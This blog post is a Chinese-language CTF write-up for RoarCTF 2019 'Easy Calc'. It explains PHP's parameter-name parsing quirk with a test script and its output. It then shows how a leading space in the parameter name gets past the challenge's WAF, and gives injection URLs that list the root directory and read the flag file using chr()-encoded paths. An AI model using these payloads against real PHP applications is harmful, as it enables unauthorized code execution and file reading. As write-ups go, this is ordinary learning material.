<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"123-prog.github.io","root":"/","images":"/images","scheme":"Mist","version":"8.2.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}};
  </script>
<meta name="description" content="0x01 php变量解析漏洞起因是get,post或其他方法获取来的变量如果不符合php的变量规则，php会对其进行适当的转换，更改为符合规则的变量名。主要是将某些字符删除或者替换成下划线。接下来看一下主要是哪些字符会引发这个操作">
<meta property="og:type" content="article">
<meta property="og:title" content="(RoarCTF 2019) Easy Calc">
<meta property="og:url" content="https://123-prog.github.io/2021/03/10/RoarCTF-2019-Easy-Calc/index.html">
<meta property="og:site_name" content="nappingCat&#39;s Blog">
<meta property="og:description" content="0x01 php变量解析漏洞起因是get,post或其他方法获取来的变量如果不符合php的变量规则，php会对其进行适当的转换，更改为符合规则的变量名。主要是将某些字符删除或者替换成下划线。接下来看一下主要是哪些字符会引发这个操作">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-03-10T06:46:42.000Z">
<meta property="article:modified_time" content="2021-03-10T07:35:19.784Z">
<meta property="article:author" content="Guangyue">
<meta property="article:tag" content="php变量解析漏洞，简单绕waf">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://123-prog.github.io/2021/03/10/RoarCTF-2019-Easy-Calc/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>
<title>(RoarCTF 2019) Easy Calc | nappingCat's Blog</title>
  




  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">nappingCat's Blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-php%E5%8F%98%E9%87%8F%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">0x01 php变量解析漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02"><span class="nav-number">2.</span> <span class="nav-text">0x02</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Guangyue"
      src="/images/avatar2.jpg">
  <p class="site-author-name" itemprop="name">Guangyue</p>
  <div class="site-description" itemprop="description">2571374157@qq.com</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://123-prog.github.io/2021/03/10/RoarCTF-2019-Easy-Calc/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar2.jpg">
      <meta itemprop="name" content="Guangyue">
      <meta itemprop="description" content="2571374157@qq.com">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="nappingCat's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          (RoarCTF 2019) Easy Calc
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2021-03-10 14:46:42 / Modified: 15:35:19" itemprop="dateCreated datePublished" datetime="2021-03-10T14:46:42+08:00">2021-03-10</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h3 id="0x01-php变量解析漏洞"><a href="#0x01-php变量解析漏洞" class="headerlink" title="0x01 php变量解析漏洞"></a>0x01 php变量解析漏洞</h3><p>起因是get,post或其他方法获取来的变量如果不符合php的变量规则，php会对其进行适当的转换，更改为符合规则的变量名。主要是将某些字符删除或者替换成下划线。接下来看一下主要是哪些字符会引发这个操作</p>
<a id="more"></a>

<p>php的变量规则：<code>&#39;^[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff]*$&#39;</code>。这里的\80-\xff是ASCII的扩展码，其中包括一些数学符号，音符等等，这里既然这些符号是符合php变量规则的，我们就不必测试这些扩展码了。</p>
<p>在php中<code>parse_str()</code>函数和 $_GET，$_POST 在 PHP 中填充变量相似，也使用了同样的机制，所以测试代码中使用这个函数来代替</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;*</span><br><span class="line">parse_str会对指定的字符串进行解析并转化为有效的变量名，有些非法的变量名就会进行替换，</span><br><span class="line">比如替换成下划线，或者之间删去，这个程序测试哪些字符会被替换成空或者下划线</span><br><span class="line">*&#x2F;</span><br><span class="line">$test_list &#x3D; [&quot;&#123;&#125;test_val&quot;,&quot;test&#123;&#125;_val&quot;,&quot;test_val&#123;&#125;&quot;];</span><br><span class="line">foreach($test_list as $key&#x3D;&gt;$val)</span><br><span class="line">&#123;</span><br><span class="line">    for($i&#x3D;0;$i&lt;127;$i++)</span><br><span class="line">    &#123;</span><br><span class="line">        $new_val &#x3D; str_replace(&quot;&#123;&#125;&quot;,chr($i),$val);</span><br><span class="line">        parse_str($new_val,$output);</span><br><span class="line">        if(isset($output[&#39;test_val&#39;]))</span><br><span class="line">        &#123;</span><br><span class="line">            echo $i.&quot;:&quot;.chr($i).&quot; &#x3D;&gt;&quot;.&quot;删除&quot;.&quot;\n&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        if(isset($output[&#39;_test_val&#39;])||isset($output[&#39;test__val&#39;])||isset($output[&#39;test_val_&#39;]))</span><br><span class="line">        &#123;</span><br><span class="line">            echo $i.&quot;:&quot;.chr($i).&quot; &#x3D;&gt;&quot;.&quot;_\n&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    echo &quot;\n&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>结果是:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">32:  &#x3D;&gt;删除</span><br><span class="line">38:&amp; &#x3D;&gt;删除</span><br><span class="line">43:+ &#x3D;&gt;删除</span><br><span class="line">46:. &#x3D;&gt;_</span><br><span class="line">95:_ &#x3D;&gt;_</span><br><span class="line"></span><br><span class="line">32:  &#x3D;&gt;_</span><br><span class="line">43:+ &#x3D;&gt;_</span><br><span class="line">46:. &#x3D;&gt;_</span><br><span class="line">91:[ &#x3D;&gt;_</span><br><span class="line">95:_ &#x3D;&gt;_</span><br><span class="line"></span><br><span class="line">0: &#x3D;&gt;删除</span><br><span class="line">32:  &#x3D;&gt;_</span><br><span class="line">38:&amp; &#x3D;&gt;删除</span><br><span class="line">43:+ &#x3D;&gt;_</span><br><span class="line">46:. &#x3D;&gt;_</span><br><span class="line">61:&#x3D; &#x3D;&gt;删除</span><br><span class="line">91:[ &#x3D;&gt;_</span><br><span class="line">95:_ &#x3D;&gt;_</span><br></pre></td></tr></table></figure>
<p>也可以看出在变量中间，开头，结尾插入不符合规则的字符时，处理的方式也不一样</p>
<h3 id="0x02"><a href="#0x02" class="headerlink" title="0x02"></a>0x02</h3><p>题目很简单，waf也只是限制了变量不能为字符串，利用上面的解析漏洞，我们 传入的变量如果有一些特殊的符号就可以绕过这个waf,如果在之后的解析中，这个特殊符号被替换为空了，不就达到目的了</p>
<p>这里采用在传参的时候给参数前面加个空格%20</p>
<p><code>/calc.php?%20num=s</code>成功传入</p>
<p><code>/calc.php?%20num=print_r(scandir(chr(47)))</code>扫根目录，这里/被过滤，利用函数生成</p>
<p>发现flag文件，打开得到flag</p>
<p><code>/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))</code></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/php%E5%8F%98%E9%87%8F%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%EF%BC%8C%E7%AE%80%E5%8D%95%E7%BB%95waf/" rel="tag"># php变量解析漏洞，简单绕waf</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/02/12/Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" rel="prev" title="Http请求走私（smuggling)学习记录">
                  <i class="fa fa-chevron-left"></i> Http请求走私（smuggling)学习记录
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/03/10/GXYCTF2019-%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83/" rel="next" title="GXYCTF2019 禁止套娃">
                  GXYCTF2019 禁止套娃 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>







<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Guangyue</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
